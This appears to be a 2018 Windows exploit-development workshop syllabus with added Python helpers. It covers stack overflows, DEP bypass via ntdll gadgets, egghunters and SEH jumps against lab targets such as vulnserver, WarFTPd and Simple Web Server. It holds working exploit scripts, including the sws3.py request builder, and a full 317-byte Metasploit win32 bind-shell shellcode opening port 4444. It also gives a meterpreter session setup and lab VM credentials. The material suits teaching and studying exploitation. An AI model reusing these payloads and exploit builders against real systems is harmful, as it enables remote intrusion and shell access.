- San Diego Exploit Development 2018
- Whitepapers of interest:
- https://www.sans.org/reading-room/whitepapers/firewalls/tactical-data-diodes-industrial-automation-control-systems-36057
- #######################
- # VMs for this course #
- #######################
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
- username: workshop
- password: password
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
- user: infosecaddicts
- pass: infosecaddicts
- You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).
- #######################################################
- # Files you may find helpful for learning Exploit Dev #
- #######################################################
- https://s3.amazonaws.com/secureninja/files/slides.zip
- https://s3.amazonaws.com/secureninja/files/ExploitDevProcessDocs.zip
- #####################################
- # Quick Stack Based Buffer Overflow #
- #####################################
- - You can download everything you need for this exercise (except netcat) from the link below
- https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
- - Extract this zip file to your Desktop
- - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
- - Open a new command prompt and type:
- ---------------------------Type This-----------------------------------
- nc localhost 9999
- -----------------------------------------------------------------------
- - In the new command prompt window where you ran nc type:
- HELP
- - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
- - Now double-click on 1-simplefuzzer.py
- - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
- - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
- - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
- - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
- - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
- - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
- - Calculate the distance to EIP by running script 3-3000chars.py
- - This script sends 3000 nonrepeating chars to vulnserv.exe and populates EIP with the value: 396F4338
- 4-count-chars-to-EIP.py
- - In the previous script we saw EIP overwritten with 396F4338. Read little-endian those bytes are 38 43 6F 39, i.e. the characters 8 (0x38), C (0x43), o (0x6F), 9 (0x39),
- - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it (the name of the next script, 5-2006char-eip-check.py, gives the answer away: 2006 bytes)
- 5-2006char-eip-check.py
- - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
- 6-jmp-esp.py
- - In this script we overwrite EIP with the address of a JMP ESP inside of essfunc.dll (0x625011AF, which goes into the buffer little-endian as \xAF\x11\x50\x62; confirm the address in your own copy of essfunc.dll with the debugger before relying on it). After the JMP ESP, ESP points at the bytes that follow EIP, so that is where the shellcode goes.
- 7-first-exploit
- - In this script we actually do the stack overflow and launch a bind shell on port 4444
- 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
- ---------------------------Type This-----------------------------------
- cd /home/infosecaddicts/toolz/metasploit/modules/exploits/windows/misc
- vi vulnserv.rb (paste the code into this file)
- cd ~/toolz/metasploit
- ./msfconsole
- use exploit/windows/misc/vulnserv
- set PAYLOAD windows/meterpreter/bind_tcp
- set RHOST CHANGEME-TO-YOUR-WIN7-IP
- set RPORT 9999
- exploit
- -----------------------------------------------------------------------------------
- Day 1 Homework:
- Watch the following videos and take notes for questions tomorrow.
- http://www.securitytube.net/video/1389
- http://www.securitytube.net/video/1398
- http://www.securitytube.net/video/1399
- -----------------------------------------------------------------------------------------------------------------------
- #########
- # Day 2 #
- #########
- You can download the Secure Ninja courseware here:
- https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx
- Morning challenge:
- Your task is to convert the SLMail 5.5 exploit (https://www.exploit-db.com/exploits/646) to the multiple script format used yesterday with vulnserver.
- Day 2 Homework:
- Watch the following videos and take notes for questions tomorrow.
- http://www.securitytube.net/video/1406
- http://www.securitytube.net/video/1407
- http://www.securitytube.net/video/1408
- -----------------------------------------------------------------------------------------------------------------------
- #########
- # Day 3 #
- #########
- You can download the Secure Ninja courseware here:
- https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx
- Morning challenge:
- Your task is to convert the Easy File Sharing Web Server 7.2 exploit (https://www.exploit-db.com/exploits/39008/) to the multiple script format used with vulnserver and SLMail on your Windows 7 host machine.
- NOTE: If you did the SLMail exploit on Windows XP yesterday, then please do it on Windows 7 today prior to doing the Easy File Sharing Web Server 7.2 exploit.
- Day 3 Homework:
- Watch the following videos and take notes for questions tomorrow.
- https://s3.amazonaws.com/secureninja/videos/0006-Intro-to-Mona.mp4
- https://s3.amazonaws.com/secureninja/videos/0007-Mona-continued.mp4
- https://s3.amazonaws.com/secureninja/videos/0014-DEP-Basics.mp4
- https://s3.amazonaws.com/secureninja/videos/0015-Bypassing-DEP-using-ROP-chains.mp4
- #########
- # Day 4 #
- #########
- You can download the Secure Ninja courseware here:
- https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx
- Morning challenge:
- Your task is to convert the Konica Minolta exploit (https://www.exploit-db.com/exploits/39215/, https://www.exploit-db.com/exploits/38252/, https://www.exploit-db.com/exploits/38254/) to the multiple script format used with vulnserver, SLMail, and Easy File Sharing Web Server 7.2 on your Windows 7 host machine.
- -------------------------------------------------------------------
- All of the content below uses a different lab set (the Strategicsec XP target and attack VMs plus the Ubuntu host):
- You can download the Exploit Dev VMs from the links below:
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
- user: Administrator
- pass: strategicsec
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/StrategicsecUbuntu-v3.zip
- user: strategicsec
- pass: strategicsec
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
- user: exploitlab
- pass: exploitlab
- All of the exploit scripts listed below are contained in the following zip file. Please download it to your XP-ED-Attack-Host VM. The password for the zip file is: joemccray
- https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip
- ###########################
- # Lab 1a: Stack Overflows #
- ###########################
- #################################
- # Start WarFTPd #
- # Start WinDBG #
- # Press F6 #
- # Attach to war-ftpd.exe #
- #################################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
- python warftpd1.py | nc XPSP3-ED-Target-IP 21
- -----------------------------------------------------------------------
- At WINDBG prompt
- “r” to show registers or “alt+4”
- ---------------------------Type This-----------------------------------
- dd esp
- -----------------------------------------------------------------------
- ---------------------------Type This-----------------------------------
- python warftpd2.py | nc XPSP3-ED-Target-IP 21
- -----------------------------------------------------------------------
- At WINDBG prompt
- “r” to show registers or “alt+4”
- ---------------------------Type This-----------------------------------
- dd esp
- -----------------------------------------------------------------------
- Eip: 32714131
- esp: affd58 (71413471)
- Now we need to SSH into the StrategicSec Ubuntu host
- ---------------------------Type This-----------------------------------
- cd /home/strategicsec/toolz/metasploit/tools
- ruby pattern_offset.rb 32714131
- 485
- ruby pattern_offset.rb 71413471
- 493
- -----------------------------------------------------------------------
- Distance to EIP is: 485
- Relative position of ESP is: 493
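The pattern_offset.rb step above (and the 3-3000chars.py / 4-count-chars-to-EIP.py pair on Day 1, and the same step in Labs 1b and 2a) all do the same thing: generate Metasploit's cyclic pattern and find where four bytes of it sit. As an added example, not the course's own tooling, here is that pattern and the offset lookup in Python 3, checked against every value on the page. The only assumption is the pattern alphabet (A-Z, a-z, 0-9 in Metasploit's order), which is what makes the results agree with pattern_offset.rb.

```python
#!/usr/bin/env python3
"""Metasploit-style cyclic pattern: pattern_create / pattern_offset (added example)."""
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length):
    """Aa0Aa1Aa2...Az9Ba0... cut to `length` bytes (unique 4-byte windows up to 20280 bytes)."""
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length=20280):
    """Offset of a 4-byte sequence in the pattern, or None.

    `value` is either the register as the debugger shows it (an int such as
    0x32714131, unpacked little-endian to the bytes "1Aq2") or the 4 bytes.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


def eip_chars(value):
    """The four characters behind a register value, in the order they sit in memory."""
    return struct.pack("<I", value).decode("latin-1")


if __name__ == "__main__":
    import sys
    for arg in sys.argv[1:]:                 # python3 pattern.py 32714131 71413471
        v = int(arg, 16)
        print("%08x -> %r at offset %s" % (v, eip_chars(v), pattern_offset(v)))
```

The little-endian unpack is the whole trick: EIP shows 32714131, but the bytes that overwrote it were 31 41 71 32, i.e. "1Aq2", and that is the string to search for.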
- RET: pops the return address off the stack into EIP
- RET 4: pops the return address into EIP and then adds 4 to ESP, discarding the next 4 bytes (this is why the data at ESP is 8 bytes past EIP here, 493 vs 485, rather than 4)
- ---------------------------Type This-----------------------------------
- cd /home/strategicsec/toolz/metasploit/
- ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
- -----------------------------------------------------------------------
- 0x7c9c167d push esp; retn 0x304d
- 0x7c9d30d7 jmp esp < - how about we use this one
- 0x7c9d30eb jmp esp
- 0x7c9d30ff jmp esp
- warftpd3.py with Notepad++
- Fill in the appropriate values
- Distance to EIP
- Address of JMP ESP
- ---------------------------Type This-----------------------------------
- python warftpd3.py | nc XPSP3-ED-Target-IP 21
- 0:003> dd eip
- 0:003> dd esp
- -----------------------------------------------------------------------
- Bad characters: bytes the target mangles or truncates on (0x00 always; 0x0a and 0x0d for a line-based protocol like FTP) must not appear in the return address or the shellcode, so they have to be found first and the encoder told to avoid them.
- Run the final exploit without the debugger attached:
- ---------------------------Type This-----------------------------------
- python warftpd4.py | nc XPSP3-ED-Target-IP 21
- nc XPSP3-ED-Target-IP 4444
- -----------------------------------------------------------------------
- ###########################################
- # Lab 1b: Stack Overflows with DEP Bypass #
- ###########################################
- Reboot your target host and choose the "2nd" option for DEP.
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
- ---------------------------Type This-----------------------------------
- python warftpd1.py | nc XPSP3-ED-Target-IP 21
- At WINDBG prompt
- “r” to show registers or “alt+4”
- dd esp
- python warftpd2.py | nc XPSP3-ED-Target-IP 21
- At WINDBG prompt
- “r” to show registers or “alt+4”
- dd esp
- -----------------------------------------------------------------------
- Eip: 32714131
- esp: affd58 (71413471)
- Now we need to SSH into the StrategicSec Ubuntu host
- ---------------------------Type This-----------------------------------
- cd /home/strategicsec/toolz/metasploit/tools
- ruby pattern_offset.rb 32714131
- 485
- ruby pattern_offset.rb 71413471
- 493
- cd /home/strategicsec/toolz/metasploit/
- ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
- python warftpd3.py | nc XPSP3-ED-Target-IP 21
- 0:003> dd eip
- 0:003> dd esp
- INT3s - GOOD!!!!!!!
- python warftpd4.py | nc XPSP3-ED-Target-IP 21
- nc XPSP3-ED-Target-IP 4444
- -----------------------------------------------------------------------
- The exploit that worked in Lab 1a does not work here.
- Why? DEP. With hardware DEP enabled the stack is non-executable, so jumping to the shellcode raises an access violation instead of running it. The fix on XP SP3 is to make the process turn DEP off for itself before we return into the stack:
- Let's look through ole32.dll for the following instructions:
- mov al,0x1
- ret 0x4
- LdrpCheckNXCompatibility branches on AL: when AL is 1 it takes the path that disables DEP for the process. So the first gadget has to set AL to 1 and return (the ret 4 also throws away one dword, which the payload below accounts for).
- ---------------------------Type This-----------------------------------
- ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
- -----------------------------------------------------------------------
- [DLLs/xpsp3/ole32.dll]
- 0x775ee00e b001c204
- 0x775ee00e mov al, 1
- 0x775ee010 ret 4
- Then we need to jump to the LdrpCheckNXCompatibility routine in
- ntdll.dll that disables DEP.
- Inside of ntdll.dll we need to find the following instructions:
- CMP AL,1
- PUSH 2
- POP ESI
- JE ntdll.7
- ---------------------------Type This-----------------------------------
- ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
- -----------------------------------------------------------------------
- [DLLs/xpsp3/ntdll.dll]
- 0x7c91cd24 3c016a025e0f84
- 0x7c91cd24 cmp al, 1
- 0x7c91cd26 push 2
- 0x7c91cd28 pop esi
- 0x7c91cd29 jz 7
- This set of instructions checks that AL is 1 (which is why we set it first), puts 2 (MEM_EXECUTE_OPTION_ENABLE) into ESI, and the JE then takes the branch inside LdrpCheckNXCompatibility that calls ZwSetInformationProcess with those execute flags, turning DEP off for the whole process before control comes back to our stack.
- ---------------------------Type This-----------------------------------
- dep = "\x0e\xe0\x5e\x77"+\    # 0x775ee00e (ole32.dll): mov al,1 ; ret 4   <- goes where EIP is overwritten
-       "\xff\xff\xff\xff"+\    # the 4 bytes between the return address and the data at ESP (EIP at 485, ESP data at 493)
-       "\x24\xcd\x91\x7c"+\    # 0x7c91cd24 (ntdll.dll): cmp al,1 ; push 2 ; pop esi ; je ...  <- popped into EIP by the ret
-       "\xff\xff\xff\xff"+\    # skipped by the "ret 4"
-       "A"*0x54                 # padding; warftpd5.py puts the rest of the payload after this
- python warftpd5.py | nc XPSP3-ED-Target-IP 21
- nc XPSP3-ED-Target-IP 4444
- -----------------------------------------------------------------------
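Both msfpescan -r searches above look for raw opcode bytes in a DLL on disk and report the address those bytes will have once the DLL is mapped. The part that makes the result usable is the file-offset to virtual-address translation through the PE section table. As an added example (not msfpescan's code), here is that translation in Python 3 with the three byte patterns from this lab, plus a constructed minimal PE32 file used only as offline test input. The reported addresses assume the DLL loads at its preferred ImageBase, which holds on XP (no ASLR) but not on a system that relocates modules.

```python
#!/usr/bin/env python3
"""Find opcode sequences in a 32-bit DLL and report their virtual addresses (added example)."""
import re
import struct

JMP_ESP = rb"\xff\xe4"                            # jmp esp
PUSH_ESP_RET = rb"\x54\xc3"                       # push esp ; ret   (same effect)
MOV_AL_1_RET4 = rb"\xb0\x01\xc2\x04\x00"          # mov al,1 ; ret 4  (the ole32.dll gadget)
NX_CHECK = rb"\x3c\x01\x6a\x02\x5e\x0f\x84"       # cmp al,1 ; push 2 ; pop esi ; je (ntdll.dll)


def pe_sections(data):
    """(ImageBase, [(VirtualAddress, PointerToRawData, SizeOfRawData), ...]) of a PE32 file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled")
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + i * 40            # IMAGE_SECTION_HEADER is 40 bytes
        va, raw_size, raw_off = struct.unpack_from("<III", data, hdr + 12)
        sections.append((va, raw_off, raw_size))
    return image_base, sections


def raw_to_va(offset, image_base, sections):
    """File offset -> virtual address at the preferred ImageBase (None if not in a section)."""
    for va, raw_off, raw_size in sections:
        if raw_off <= offset < raw_off + raw_size:
            return image_base + va + (offset - raw_off)
    return None


def find_gadgets(data, pattern):
    """All (virtual address, bytes) hits of a bytes regex inside mapped sections."""
    image_base, sections = pe_sections(data)
    hits = []
    for m in re.finditer(pattern, data):
        va = raw_to_va(m.start(), image_base, sections)
        if va is not None:
            hits.append((va, m.group(0)))
    return hits


def make_fake_pe(image_base, text):
    """Constructed minimal PE32 with one .text section (test input, not a real DLL)."""
    raw_off = 0x200
    raw_size = max(0x200, (len(text) + 0x1FF) & ~0x1FF)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                        # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)  # 1 section, 0xE0-byte optional header
    opt = struct.pack("<HBBIIIIIII", 0x10B, 0, 0, 0, 0, 0, 0x1000, 0x1000, 0x2000, image_base)
    opt = opt.ljust(0xE0, b"\0")
    sec = b".text\0\0\0" + struct.pack("<IIII", raw_size, 0x1000, raw_size, raw_off) + b"\0" * 16
    headers = (dos + coff + opt + sec).ljust(raw_off, b"\0")
    return headers + text.ljust(raw_size, b"\0")


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:         # python3 gadgets.py shell32.dll
        for va, raw in find_gadgets(f.read(), JMP_ESP):
            print("0x%08x  %s" % (va, raw.hex()))
```

Hits in the header region are dropped on purpose: a match that is not inside a mapped section has no address at runtime. Before using a hit, check that its module is not ASLR- or rebase-prone on the target and that the address contains none of the bad characters found earlier.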
- ########################################
- # Lab 2a: Not Enough Space (Egghunter) #
- ########################################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
- -----------------------------------------------------------------------
- SWS - SIMPLE WEB SERVER
- -----------------------
- Running SWS on Strategicsec-XP-ED-Target-VM
- Start > Programs > Simple Web Server (it's in the middle somewhere)
- Red icon in system tray
- Double click it
- - it will pop up a menu
- - select "start"
- - dialog box shows starting params - port 82
- WinDBG
- - attach to "server.exe"
- ---------------------------Type This-----------------------------------
- python sws1.py | nc XPSP3-ED-Target-IP 82
- python sws2.py | nc XPSP3-ED-Target-IP 82
- SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
- cd /home/strategicsec/toolz/metasploit/tools
- ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
- ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
- -----------------------------------------------------------------------
- EGGHUNTER:
- ----------
- "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
- "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
-       ^^^^^^^^^^^^^^^^ the tag "ABBA" (0x41 0x42 0x42 0x41): the hunter scans memory for it twice in a row and jumps to whatever follows
- Request layout: the JMP ESP in [ EIP ] lands on the 32-byte egghunter in the URL; the large (Alpha2 encoded) shellcode, which does not fit there, goes in a header prefixed with the doubled tag:
- GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
- User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
- -----sws3.py-----
- #!/usr/bin/python2
- import os      # for output setting
- import sys
- import struct  # for pack function
- # turn off output buffering and put stdout in binary mode (we are piped into nc)
- sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
- pad = "A" * 225          # distance to EIP (pattern_offset 41356841)
- eip = 0x7e429353         # EIP -> "jmp esp" in user32.dll; ESP points at the egghunter right after it
- # 32-byte egghunter: looks for the tag "ABBA" twice in a row and jumps to what follows it
- egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
- egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
- shellcode = "\xCC" * 700  # stand-in for the real payload: 700 INT3s prove the hunter found the egg
- buf = "GET /"
- buf += pad + struct.pack('<I', eip) + egghunter   # the overflow: padding, JMP ESP, hunter
- buf += " HTTP/1.0\r\n"
- buf += "User-Agent: ABBAABBA"                   # the egg (tag twice) marks where the payload starts
- buf += shellcode
- buf += " HTTP/1.0\r\n"                          # end of the request
- sys.stdout.write(buf)
- -----
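Two details of the egghunter are easy to get wrong: which bytes of it hold the tag, and why the egg in front of the payload is the tag twice. As an added example (not part of the course skeleton), the code below patches a tag of your choice into the hunter from the page, builds the sws3.py request with it, and models in Python what the hunter does in memory, so the doubled-egg convention can be checked offline. The hunter bytes are the ones on the page; the request layout (offset 225, JMP ESP 0x7e429353) is the page's too.

```python
#!/usr/bin/env python3
"""Egghunter helpers: patch the tag, build the SWS request, model the search (added example)."""
import struct

# skape's NtAccessCheckAndAuditAlarm (syscall 2 via int 2e) egghunter as on the page; the
# 4-byte tag is the imm32 of "mov eax, <tag>" and is patched in by egghunter() below.
HUNTER_TEMPLATE = (
    b"\x66\x81\xca\xff\x0f"   # or dx, 0x0fff      ; go to the last byte of the current page
    b"\x42"                   # inc edx            ; ... and on to the next page / next byte
    b"\x52"                   # push edx
    b"\x6a\x02"               # push 2
    b"\x58"                   # pop eax            ; syscall number 2
    b"\xcd\x2e"               # int 0x2e           ; probes whether the page at edx is readable
    b"\x3c\x05"               # cmp al, 5          ; low byte of STATUS_ACCESS_VIOLATION
    b"\x5a"                   # pop edx
    b"\x74\xef"               # je  back to "or dx" ; unmapped page: skip it entirely
    b"\xb8" b"TAG!"           # mov eax, <tag>     ; placeholder, patched below
    b"\x8b\xfa"               # mov edi, edx
    b"\xaf"                   # scasd              ; compare the first copy of the tag
    b"\x75\xea"               # jne back to "inc edx"
    b"\xaf"                   # scasd              ; compare the second copy
    b"\x75\xe7"               # jne back to "inc edx"
    b"\xff\xe7"               # jmp edi            ; edi is now just past the doubled egg
)
TAG_OFFSET = HUNTER_TEMPLATE.index(b"TAG!")       # 18


def egghunter(tag=b"ABBA"):
    """The 32-byte hunter with `tag` in place of the placeholder."""
    if len(tag) != 4:
        raise ValueError("tag must be exactly 4 bytes")
    return HUNTER_TEMPLATE[:TAG_OFFSET] + tag + HUNTER_TEMPLATE[TAG_OFFSET + 4:]


def egg(tag=b"ABBA"):
    """The egg is the tag twice: the hunter holds a single copy, so it never matches itself."""
    return tag * 2


def find_egg(memory, tag=b"ABBA"):
    """What the hunter does, in Python: offset just past the first doubled tag, or None."""
    idx = memory.find(egg(tag))
    return None if idx < 0 else idx + 8


def build_request(offset=225, jmp_esp=0x7e429353, shellcode=b"\xcc" * 700, tag=b"ABBA"):
    """sws3.py's request: hunter in the overflowed URL, egg + real payload in User-Agent."""
    url = b"A" * offset + struct.pack("<I", jmp_esp) + egghunter(tag)
    return (b"GET /" + url + b" HTTP/1.0\r\n"
            + b"User-Agent: " + egg(tag) + shellcode + b"\r\n\r\n")


if __name__ == "__main__":
    import sys
    sys.stdout.buffer.write(build_request())     # python3 sws_egg.py | nc target 82
```

Pick a tag that is unlikely to occur naturally and that survives the target's input handling; "ABBA" is fine for a lab, but a tag made of printable letters can collide with ordinary strings in a large process, which costs you a jump into garbage rather than the payload.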
- ############################################
- # Lab 2b: Not Enough Space (Negative Jump) #
- ############################################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
- -----------------------------------------------------------------------
- Payload layout (the skeleton's variable names):
- [pad = distance_to_seh - len(shellcode)] [shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip = POP POP RET] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
- 1. Overflow the buffer through the SEH record: pad + shellcode fill the distance to the record, jmp4 lands in the next-SEH field and eip overwrites the handler address.
- 2. The exception fires and the "handler" runs: POP POP RET pops two dwords off the stack and returns into the next-SEH field.
- 3. jmp4 (two NOPs and JMP SHORT +4) jumps over the 4-byte handler address into jmp_min.
- 4. jmp_min (JMP -0x1068, i.e. 4200 bytes back) lands in the NOP pad and slides into the shellcode.
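The four steps above hinge on two relative jumps whose encodings are easy to get wrong: the short jump over the handler address and the near jump back. As an added example (not the modjk skeleton), the code below encodes both, assembles the layout with the page's constants, and computes where the negative jump lands so it can be checked against the NOP pad before anything is sent. distance_to_seh and the POP POP RET address are not given on the page; the values 4500 and 0x10101010 in the test are hypothetical stand-ins.

```python
#!/usr/bin/env python3
"""SEH overwrite layout with short-jump-over-handler and a negative near jump (added example)."""
import struct


def jmp_short(delta):
    """EB rel8; delta is measured from the end of this 2-byte instruction."""
    if not -128 <= delta <= 127:
        raise ValueError("short jump out of range")
    return b"\xeb" + struct.pack("<b", delta)


def jmp_near(delta):
    """E9 rel32; delta is measured from the end of this 5-byte instruction."""
    return b"\xe9" + struct.pack("<i", delta)


def decode_rel32(code):
    """Inverse of jmp_near, for checking what a captured E9 actually jumps to."""
    if len(code) != 5 or code[0] != 0xE9:
        raise ValueError("not a 5-byte E9 jump")
    return struct.unpack("<i", code[1:])[0]


def build_seh_payload(distance_to_seh, shellcode, pop_pop_ret, back_jump=-0x1068):
    """[NOP pad][shellcode][nSEH: nop nop jmp +4][SEH: pop pop ret][jmp back]"""
    if len(shellcode) > distance_to_seh:
        raise ValueError("shellcode does not fit before the SEH record")
    pad = b"\x90" * (distance_to_seh - len(shellcode))
    nseh = b"\x90\x90" + jmp_short(4)            # the page's jmp4: skip the 4-byte handler address
    seh = struct.pack("<I", pop_pop_ret)         # must be a module without SafeSEH
    return pad + shellcode + nseh + seh + jmp_near(back_jump)


def landing_offset(distance_to_seh, back_jump=-0x1068):
    """Offset from the buffer start where execution resumes after the negative jump."""
    jmp_end = distance_to_seh + 4 + 4 + 5        # nSEH + handler + the E9 itself
    return jmp_end + back_jump


def check_layout(distance_to_seh, shellcode, back_jump=-0x1068):
    """True when the jump lands in the NOP pad (anywhere before the shellcode start)."""
    land = landing_offset(distance_to_seh, back_jump)
    return 0 <= land < distance_to_seh - len(shellcode)
```

The size of the back jump only has to be large enough to clear the shellcode; anything landing in the pad works, which is why the pad is NOPs and not arbitrary filler. check_layout() is the test to run after changing the shellcode length, since a bigger payload shrinks the pad the jump must land in.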
- #########################################
- # Lab 2c: Not Enough Space (Trampoline) #
- #########################################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
- -----------------------------------------------------------------------
- On the Strategicsec-XP-ED-Target-VM VM
- - open a command prompt
- - c:\software\tftpd32
- - run tftpd32.exe
- - UDP port 69
- (socket code is already in the scripts)
- On your attack host please install:
- NASM - Netwide Assembler
- -----------------------------------------------------------------------------------------------------------------
- We want to generate the shellcode (BIND SHELL on Port 4444)
- - No restricted characters
- - Encoder: NONE
- Create a Python file called dumpshellcode.py
- ---
- #!/usr/bin/python2
- import os
- import sys
- import struct
- # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
- shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
- shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
- shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
- shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
- shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
- shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
- shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
- shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
- shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
- shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
- shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
- shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
- shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
- shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
- shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
- shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
- shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
- shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
- shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
- shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
- sys.stdout.write(shellcode)
- ---
- python dumpshellcode.py > bindshell.bin
- copy bindshell.bin into the "c:\Program Files\nasm" directory
- Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
- 317 bindshell.bin   (byte count; matches Size=317 in the generator comment)
- ---------------------------Type This-----------------------------------
- C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
- -----------------------------------------------------------------------
- 00000000 FC cld
- 00000001 6AEB push byte -0x15
- 00000003 4D dec ebp
- 00000004 E8F9FFFFFF call dword 0x2
- 00000009 60 pushad
